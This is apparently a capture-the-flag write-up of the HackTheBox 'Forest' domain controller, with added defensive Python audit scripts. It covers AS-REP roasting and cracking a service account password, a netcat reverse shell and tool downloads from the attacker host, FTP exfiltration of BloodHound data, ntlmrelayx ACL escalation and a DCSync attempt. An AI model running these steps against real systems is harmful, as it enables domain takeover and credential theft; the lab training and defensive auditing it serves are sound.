htb-forest-nl

As usual, first an nmap scan

root@kalivm:~/Forest# nmap -sTV -p 1-65535 -oN fullscan_tcp 10.10.10.161
Starting Nmap 7.80 (https://nmap.org ) at 2020-01-06 11:47 CET
Nmap scan report for 10.10.10.161
Host is up (0.016s latency).
Not shown: 65511 closed ports
PORT      STATE SERVICE      VERSION
53/tcp    open  domain?
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2019-10-21 09:54:20Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49674/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc        Microsoft Windows RPC
49682/tcp open  msrpc        Microsoft Windows RPC
49701/tcp open  msrpc        Microsoft Windows RPC
49913/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 159.67 seconds

There are already several interesting things in this result. First of all, this is a domain-joined system in the HTB.local domain. It exposes Kerberos, LDAP and SMB to the outside world and looks like a domain controller. And last but not least, a WinRM port (5985) is open. This could be an attack similar to the approach I took a long time ago for the ‘Active’ machine on Hackthebox, combined with the WinRM attack on Heist!

First let’s try enum4linux to see if I can list some more information.

root@kalivm:~/Forest# enum4linux -a 10.10.10.161
Starting enum4linux v0.8.9 
 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.10.161
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
---snip---
 =========================================== 
|    Getting domain SID for 10.10.10.161    |
 =========================================== 
Domain Name: HTB
Domain Sid: S-1-5-21-3072663084-364016917-1341370565
[+] Host is part of a domain (not a workgroup)
---snip---
 ============================= 
|    Users on 10.10.10.161    |
 ============================= 
---snip---
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
---snip---
 ==================================================== 
|    Password Policy Information for 10.10.10.161    |
 ==================================================== 
[+] Attaching to 10.10.10.161 using a NULL share
[+] Trying protocol 445/SMB...
[+] Found domain(s):
    [+] HTB
    [+] Builtin
[+] Password Info for Domain: HTB
    [+] Minimum password length: 7
    [+] Password history length: 24
    [+] Maximum password age: 41 days 23 hours 53 minutes 
    [+] Password Complexity Flags: 000000
        [+] Domain Refuse Password Change: 0
        [+] Domain Password Store Cleartext: 0
        [+] Domain Password Lockout Admins: 0
        [+] Domain Password No Clear Change: 0
        [+] Domain Password No Anon Change: 0
        [+] Domain Password Complex: 0
    [+] Minimum password age: 1 day 4 minutes 
    [+] Reset Account Lockout Counter: 30 minutes 
    [+] Locked Account Duration: 30 minutes 
    [+] Account Lockout Threshold: None
    [+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 7
---snip---
 ============================== 
|    Groups on 10.10.10.161    |
 ============================== 
---snip---
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]
[+] Getting domain group memberships:
Group 'Enterprise Admins' (RID: 519) has member: HTB\Administrator
Group 'Privileged IT Accounts' (RID: 1149) has member: HTB\Service Accounts
Group 'Service Accounts' (RID: 1148) has member: HTB\svc-alfresco
Group 'Domain Controllers' (RID: 516) has member: HTB\FOREST$
Group 'Exchange Trusted Subsystem' (RID: 1119) has member: HTB\EXCH01$
---snip---
enum4linux complete on Mon Oct 21 12:05:29 2019

Enum4linux turns up many interesting things. First of all I see that there are some real users (sebastien, lucinda, andy, mark, santi) and an obvious service account (svc-alfresco).
Furthermore, no password complexity is enforced, which can mean easy to guess or crack passwords. There is also a Microsoft Exchange installation present, which is commonly known as a major security risk if not properly configured! And the last lines confirm the suspicion: Forest really is a member of the Domain Controllers group. So I started browsing the impacket tools and trying several until I got to the GetNPUsers.py tool.
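Those enum4linux lines are a password-policy audit in themselves. As an added example (not from this writeup or from enum4linux), the Python below parses that block and compares it against a baseline; the sample text is a constructed copy in the same shape as the output above, and the baseline thresholds (14 characters, history 24, lockout at 10) are this example's own assumptions, not a published standard.

```python
import re

# Constructed sample in the shape enum4linux prints (values as seen above).
SAMPLE_POLICY = """\
[+] Password Info for Domain: HTB
    [+] Minimum password length: 7
    [+] Password history length: 24
    [+] Maximum password age: 41 days 23 hours 53 minutes 
    [+] Password Complexity Flags: 000000
        [+] Domain Refuse Password Change: 0
        [+] Domain Password Store Cleartext: 0
        [+] Domain Password Lockout Admins: 0
        [+] Domain Password No Clear Change: 0
        [+] Domain Password No Anon Change: 0
        [+] Domain Password Complex: 0
    [+] Minimum password age: 1 day 4 minutes 
    [+] Reset Account Lockout Counter: 30 minutes 
    [+] Locked Account Duration: 30 minutes 
    [+] Account Lockout Threshold: None
    [+] Forced Log off Time: Not Set
"""

# One "[+] key: value" line; the value may be empty or contain spaces.
LINE_RE = re.compile(r"^\s*\[\+\]\s*(?P<key>[^:]+):\s*(?P<value>.*?)\s*$")


def parse_policy(text):
    """Return {setting: value} for every '[+] key: value' line in the block."""
    policy = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            policy[m.group("key").strip()] = m.group("value")
    return policy


def _as_int(value):
    try:
        return int(value)
    except (TypeError, ValueError):
        return None


def audit_policy(policy, min_length=14, min_history=24, max_lockout_threshold=10):
    """Compare a parsed policy with a baseline and return a list of findings.
    The baseline numbers are this example's assumptions, not a standard."""
    findings = []
    length = _as_int(policy.get("Minimum password length"))
    if length is not None and length < min_length:
        findings.append(f"minimum length {length} is below {min_length}")
    if policy.get("Domain Password Complex") == "0":
        findings.append("password complexity is disabled")
    if policy.get("Domain Password Store Cleartext") == "1":
        findings.append("passwords are stored with reversible encryption")
    history = _as_int(policy.get("Password history length"))
    if history is not None and history < min_history:
        findings.append(f"history length {history} is below {min_history}")
    threshold = policy.get("Account Lockout Threshold")
    if threshold == "None":
        findings.append("no lockout threshold: online password guessing is unlimited")
    else:
        t = _as_int(threshold)
        if t is not None and t > max_lockout_threshold:
            findings.append(f"lockout threshold {t} is above {max_lockout_threshold}")
    return findings


if __name__ == "__main__":
    for finding in audit_policy(parse_policy(SAMPLE_POLICY)):
        print("[!]", finding)
```

Run against the block above it reports three findings: the 7-character minimum, complexity off, and no lockout threshold. The last one matters most for this box, since it is what makes password spraying and the later cracking attempts risk-free for the attacker.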

┌─[✗]─[puck@parrot-lt]─[~/htb/legacy/forrest]
└──╼ $python3 GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/sebastien
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
root@kalivm:~/Forest# GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/lucinda
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for lucinda
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
root@kalivm:~/Forest# GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/svc-alfresco
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB:38ca5d56d9fb6fd3c11015cecd122482$e6e0c606ccf778924c3e4dc02f63f3bfeae8c4b67ea08044268db8bde81aa007fb921555847d786b92084b72f6a2ac83d8843b33c5005e768208a7ede2e37663ce6891e080b45a11b361d0b5979e2eb9bf885f8e983ed21b4891559301dc693fc71d3eb2e7d8ec2b77b5668ec23ca4599bfddd3d9163325231d1933f50637cc8af4eba5f351dd703c91c2ded255ebec3d3629bbd0949ae1d5df267010acd0289440e255abe7955ce2c5658dd8ef83cc0eaccd84a1b293334edad0398cf78247cc275aaae85bba3f42f3de757ab726547d401f06cda2b8af5f9200d8f95f7001e

After trying it for a few users, I finally got an AS-REP (TGT) hash back for svc-alfresco, which I could try cracking with John:
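What GetNPUsers.py is testing here is a single bit in userAccountControl: DONT_REQ_PREAUTH (0x400000). The Python below is an added example, not from this writeup or from impacket: it decodes that attribute, lists the enabled accounts a defender should be looking for, and splits the $krb5asrep$ line into its fields so the encryption type is visible. The account entries are constructed; the value 4260352 is NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | DONT_REQ_PREAUTH.

```python
import re

# userAccountControl bit names (the documented values of the attribute).
UAC_FLAGS = {
    0x0001: "SCRIPT",
    0x0002: "ACCOUNTDISABLE",
    0x0008: "HOMEDIR_REQUIRED",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0040: "PASSWD_CANT_CHANGE",
    0x0080: "ENCRYPTED_TEXT_PWD_ALLOWED",
    0x0100: "TEMP_DUPLICATE_ACCOUNT",
    0x0200: "NORMAL_ACCOUNT",
    0x0800: "INTERDOMAIN_TRUST_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x20000: "MNS_LOGON_ACCOUNT",
    0x40000: "SMARTCARD_REQUIRED",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED",
    0x200000: "USE_DES_KEY_ONLY",
    0x400000: "DONT_REQ_PREAUTH",
    0x800000: "PASSWORD_EXPIRED",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
    0x4000000: "PARTIAL_SECRETS_ACCOUNT",
}
DONT_REQ_PREAUTH = 0x400000
ACCOUNTDISABLE = 0x0002


def decode_uac(value):
    """Return the names of all userAccountControl bits set in value."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def asrep_roastable(accounts):
    """accounts: iterable of (sAMAccountName, userAccountControl).
    Returns the enabled accounts with Kerberos pre-authentication switched
    off, i.e. the ones a KDC hands an AS-REP to without any proof of the
    password; those are the accounts to fix."""
    return [name for name, uac in accounts
            if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE]


# $krb5asrep$<etype>$<user>@<REALM>:<checksum>$<encrypted part>
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-f]{32})\$(?P<enc>[0-9a-f]+)$")


def parse_krb5asrep(line):
    """Split a $krb5asrep$ line into its fields. etype 23 is RC4-HMAC, keyed
    directly with the NT hash of the password; etype 17/18 are AES, keyed via
    PBKDF2, which makes every wordlist guess far more expensive."""
    m = ASREP_RE.match(line.strip())
    if not m:
        raise ValueError("not a $krb5asrep$ line")
    fields = m.groupdict()
    fields["etype"] = int(fields["etype"])
    return fields


# Constructed sample directory entries (not read from the box).
SAMPLE_ACCOUNTS = [
    ("sebastien", 0x10200),      # normal account, password never expires
    ("lucinda", 0x200),
    ("svc-alfresco", 4260352),   # NORMAL | DONT_EXPIRE_PASSWORD | DONT_REQ_PREAUTH
    ("old-svc", 0x400202),       # pre-auth off but disabled: not roastable
]

if __name__ == "__main__":
    for name, uac in SAMPLE_ACCOUNTS:
        print(f"{name:14} {uac:#10x} {' '.join(decode_uac(uac))}")
    print("roastable:", asrep_roastable(SAMPLE_ACCOUNTS))
```

The fix is simply clearing that bit (the "Do not require Kerberos preauthentication" checkbox on the account); where an application really needs it, restricting the account to AES keys at least takes etype 23 off the table. On the detection side, a DC logs event 4768 for every TGT request, and a pre-authentication type of 0 in that event is the signature of exactly this request.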

┌─[puck@parrot-lt]─[~/htb/forrest]
└──╼ $john forrest.hash --fork=4 -w=/opt/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads per process (8 total across 4 processes)
Node numbers 1-4 of 4 (fork)
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice ($krb5asrep$23$svc-alfresco@HTB)
4 1g 0:00:00:02 DONE (2022-09-06 12:12) 0.4504g/s 460108p/s 460108c/s 460108C/s s5210523..s3r10u55
1 0g 0:00:00:07 DONE (2022-09-06 12:12) 0g/s 488548p/s 488548c/s 488548C/s !)KAT9aim.ie168
Waiting for 3 children to terminate
2 0g 0:00:00:07 DONE (2022-09-06 12:12) 0g/s 485899p/s 485899c/s 485899C/s !)!\\.abygurl69
3 0g 0:00:00:07 DONE (2022-09-06 12:12) 0g/s 483932p/s 483932c/s 483932C/s !)&!@!^^^%.a6_123
Session completed

So apparently svc-alfresco's password is s3rvice. All I have to do now is log in with it, get the user hash and start escalating privileges.

┌─[puck@parrot-lt]─[~/htb/forrest]
└──╼ $evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> dir

Privilege Escalation

The next step is escalating privileges. After pressing CTRL-C one time too many, I decided it was time to set up a simple fallback shell.

root@kalivm:~/Forest# ruby shell.rb
PS > mkdir sedje
PS > cd sedje
PS > IWR -uri http://10.10.15.64:8000/nc.exe -outfile nc.exe

PS > ./nc 10.10.15.64 9002 -e powershell.exe
root@kalivm:~/Forest# nc -nvlp 9002
Listening on 0.0.0.0 9002
Connection received on 10.10.10.161 50030
Windows PowerShell 
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Users\svc-alfresco\Documents\sedje>
PS C:\Users\svc-alfresco\Documents\sedje> IWR -uri http://10.10.15.64:8000/SharpHound.ps1 -outfile SharpHound.ps1
PS C:\Users\svc-alfresco\Documents\sedje> IWR -uri http://10.10.15.64:8000/SharpHound.exe -outfile SharpHound.exe
PS C:\Users\svc-alfresco\Documents\sedje> Import-Module .\SharpHound.ps1
PS C:\Users\svc-alfresco\Documents\sedje> Invoke-BloodHound -CollectionMethod All -LDAPUser svc-alfresco -LDAPPass s3rvice
PS C:\Users\svc-alfresco\Documents\sedje> dir

    Directory: C:\Users\svc-alfresco\Documents\sedje

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        10/25/2019   5:20 AM          12950 20191025120253_BloodHound.zip
-a----        10/25/2019   5:20 AM           9151 Rk9SRVNU.bin
-a----        10/25/2019   5:18 AM         751616 SharpHound.exe
-a----        10/25/2019   5:17 AM         886595 SharpHound.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload SharpHound.exe
Info: Uploading SharpHound.exe to C:\Users\svc-alfresco\Documents\SharpHound.exe


Data: 1402196 bytes of 1402196 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ./SharpHound.exe All
2022-09-06T03:34:37.8848043-07:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound
2022-09-06T03:34:38.2441827-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-09-06T03:34:38.3847964-07:00|INFORMATION|Initializing SharpHound at 3:34 AM on 9/6/2022
2022-09-06T03:34:39.6035545-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-09-06T03:34:40.9785510-07:00|INFORMATION|Beginning LDAP search for htb.local
2022-09-06T03:34:41.4004375-07:00|INFORMATION|Producer has finished, closing LDAP channel
2022-09-06T03:34:41.4004375-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2022-09-06T03:35:11.4786322-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 47 MB RAM
2022-09-06T03:35:25.5255232-07:00|INFORMATION|Consumers finished, closing output channel
2022-09-06T03:35:25.5567715-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2022-09-06T03:35:25.6661470-07:00|INFORMATION|Status: 161 objects finished (+161 3.659091)/s -- Using 49 MB RAM
2022-09-06T03:35:25.6661470-07:00|INFORMATION|Enumeration finished in 00:00:44.7682293
2022-09-06T03:35:25.7442762-07:00|INFORMATION|Saving cache with stats: 118 ID to type mappings.
117 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2022-09-06T03:35:25.7442762-07:00|INFORMATION|SharpHound Enumeration Completed at 3:35 AM on 9/6/2022! Happy Graphing!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> dir


    Directory: C:\Users\svc-alfresco\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         9/6/2022   3:35 AM          18873 20220906033525_BloodHound.zip
-a----         9/6/2022   3:35 AM          19538 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a----         9/6/2022   3:29 AM        1051648 SharpHound.exe


*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> download 20220906033525_BloodHound.zip
Info: Downloading 20220906033525_BloodHound.zip to ./20220906033525_BloodHound.zip


Info: Download successful!

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>

After the SharpHound script and binary have been transferred, I run them as svc-alfresco and the collector produces a zip file with all relevant domain data. All that remains is to transfer that file to my local machine and analyze it with BloodHound. The easiest and most used way I learned during my OSCP journey is to create and run a small FTP script.

PS C:\Users\svc-alfresco\Documents\sedje> echo "open 10.10.15.64" > ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "anonymous" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "put 20191101052032_BloodHound.zip" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "quit" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> ftp -s:ftp 
open 10.10.15.64
Log in with USER and PASS first.
User (10.10.15.64:(none)): 
put 20191025120253_BloodHound.zip
quit

Of course, this approach requires an FTP server running on my attacking machine, which is easily done with Python's pyftpdlib:

root@kalivm:~/Forest# python -m pyftpdlib -p 21 -w
/usr/lib/python2.7/dist-packages/pyftpdlib/authorizers.py:244: RuntimeWarning: write permissions assigned to anonymous user.
  RuntimeWarning)
[I 2019-10-25 13:15:13] >>> starting FTP server on 0.0.0.0:21, pid=5057 < <<
[I 2019-10-25 13:15:13] concurrency model: async
[I 2019-10-25 13:15:13] masquerade (NAT) address: None
[I 2019-10-25 13:15:13] passive ports: None
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[] FTP session opened (connect)
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[anonymous] USER 'anonymous' logged in.
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[anonymous] STOR /root/Documents/htb/Machines/Forest/20191025120253_BloodHound.zip completed=1 bytes=12950 seconds=0.07
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[anonymous] FTP session closed (disconnect).

Thus, the file has been successfully transferred and can be loaded directly into BloodHound by simply dragging and dropping.

In BloodHound's “Shortest Paths to Domain Admins” view I see that members of the ‘Exchange Windows Permissions’ group have WriteDacl on the HTB.local domain object itself, which is enough to grant yourself rights over the whole domain (and with them, the password hashes). I can also see that svc-alfresco has GenericAll on that group through nested membership of `Service Accounts`, `Privileged IT Accounts` and `Account Operators`.

PS C:\Users\svc-alfresco\Documents\sedje> IWR -uri http://10.10.15.64:8000/PowerView.ps1 -outfile Powerview.ps1
PS C:\Users\svc-alfresco\Documents\sedje> Import-Module .\PowerView.ps1
PS C:\Users\svc-alfresco\Documents\sedje> $SecPassword = ConvertTo-SecureString 's3rvice' -AsPlainText -Force
PS C:\Users\svc-alfresco\Documents\sedje> $Cred = New-Object System.Management.Automation.PSCredential('HTB\svc-alfresco', $SecPassword)
PS C:\Users\svc-alfresco\Documents\sedje> New-DomainUser -SamAccountName sedje -AccountPassword $SecPassword -Credential $Cred | Add-DomainGroupMember 'Exchange Windows Permissions' -Credential $Cred

When you add the svc-alfresco account itself to the ‘Exchange Windows Permissions’ group, the membership is removed again after a few minutes, which is quite a pain. So I decided to add my own user to the domain, with the same password as svc-alfresco, and add that one to the `Exchange Windows Permissions` group. After that I was stuck for a long time on the very specific syntax and switches required (and available) in the impacket tools. If some Discord users had not helped me I would probably have given up, so I have to thank them for pushing me through the next step!

root@kalivm:~/Forest# ntlmrelayx.py --escalate-user sedje -t ldap://10.10.10.161
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server

[*] Servers started, waiting for connections

Now all I have to do is browse to the local HTTP listener and provide valid credentials; ntlmrelayx relays that authentication to LDAP on the DC and changes the permissions for me. So I open a browser on localhost and enter the sedje credentials.

[*] HTTPD: Received connection from 127.0.0.1, attacking target ldap://10.10.10.161
[*] HTTPD: Client requested path: /
[*] HTTPD: Client requested path: /
[*] HTTPD: Client requested path: /
[*] Authenticating against ldap://10.10.10.161 as \sedje SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] User privileges found: Create user
[*] User privileges found: Modifying domain ACL
[*] Querying domain security descriptor
[*] Success! User sedje now has Replication-Get-Changes-All privileges on the domain
[*] Try using DCSync with secretsdump.py and this user :)
[*] Saved restore state to aclpwn-20191025-135738.restoresedsedss

And ntlmrelayx.py already tells me what to do: sedje now has the replication rights needed to run secretsdump.py against the DC.
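The chain above (WriteDacl for Exchange Windows Permissions on the domain object, then the replication rights ntlmrelayx grants to sedje) is exactly what a defender should be auditing the domain root's ACL for. The Python below is an added example, not part of this writeup or of impacket: it walks a list of ACEs and reports any trustee outside an allow-list that holds the replication extended rights, or GenericAll/WriteDacl which lead there in one step. The ACE records, the trustee names and the allow-list are constructed assumptions; the three GUIDs are the real extended-right identifiers.

```python
# Extended-right GUIDs that together allow replicating secrets out of a DC.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# Generic rights on the domain object that lead to the same outcome:
# GenericAll includes every right; WriteDacl lets the holder grant itself
# the replication rights (which is what ntlmrelayx did above).
CONTROL_RIGHTS = {"genericall": "GenericAll", "writedacl": "WriteDacl"}

# Assumed allow-list of principals that normally hold replication rights.
EXPECTED_TRUSTEES = {
    "HTB\\Domain Controllers",
    "NT AUTHORITY\\ENTERPRISE DOMAIN CONTROLLERS",
    "BUILTIN\\Administrators",
    "HTB\\Domain Admins",
    "HTB\\Enterprise Admins",
    "NT AUTHORITY\\SYSTEM",
}

# Constructed ACEs as they might be read off the domain root after the steps above.
SAMPLE_ACES = [
    {"trustee": "HTB\\Domain Controllers", "type": "Allow", "right": "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"},
    {"trustee": "HTB\\Domain Controllers", "type": "Allow", "right": "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"},
    {"trustee": "NT AUTHORITY\\ENTERPRISE DOMAIN CONTROLLERS", "type": "Allow", "right": "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"},
    {"trustee": "HTB\\Domain Admins", "type": "Allow", "right": "GenericAll"},
    {"trustee": "HTB\\Exchange Windows Permissions", "type": "Allow", "right": "WriteDacl"},
    {"trustee": "HTB\\lucinda", "type": "Allow", "right": "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"},
    {"trustee": "HTB\\sedje", "type": "Allow", "right": "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"},
    {"trustee": "HTB\\sedje", "type": "Allow", "right": "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"},
    {"trustee": "HTB\\sedje", "type": "Allow", "right": "89e95b76-444d-4c62-991a-0facbeda640c"},
    {"trustee": "HTB\\sedje", "type": "Deny", "right": "GenericAll"},   # Deny ACEs are not grants
]


def collect_rights(aces):
    """Map trustee -> set of relevant right names taken from Allow ACEs only."""
    held = {}
    for ace in aces:
        if ace["type"] != "Allow":
            continue
        r = ace["right"].lower()
        name = REPLICATION_RIGHTS.get(r) or CONTROL_RIGHTS.get(r)
        if name:
            held.setdefault(ace["trustee"], set()).add(name)
    return held


def can_dcsync(rights):
    """Secrets replicate only with Get-Changes plus Get-Changes-All; GenericAll
    or WriteDacl on the domain object get there with one extra step."""
    both = {"DS-Replication-Get-Changes", "DS-Replication-Get-Changes-All"}
    return both <= rights or bool(rights & set(CONTROL_RIGHTS.values()))


def unexpected_dcsync_holders(aces, expected=EXPECTED_TRUSTEES):
    """Trustees outside the allow-list that can replicate secrets, or grant
    themselves the right to: the list a defender should review."""
    return {t: r for t, r in collect_rights(aces).items()
            if t not in expected and can_dcsync(r)}


if __name__ == "__main__":
    for trustee, rights in unexpected_dcsync_holders(SAMPLE_ACES).items():
        print(f"[!] {trustee}: {', '.join(sorted(rights))}")
```

On a live domain the ACEs come from the nTSecurityDescriptor of the domain naming context (PowerView's Get-DomainObjectAcl or a plain LDAP read both work). For detection after the fact, the 4662 events a DC logs for the domain object carry these same GUIDs in their Properties field, and a replication request from an account that is not a domain controller is the classic DCSync signal.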

root@kalivm:~/Forest# secretsdump.py htb/sedje:s3rvice@10.10.10.161
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
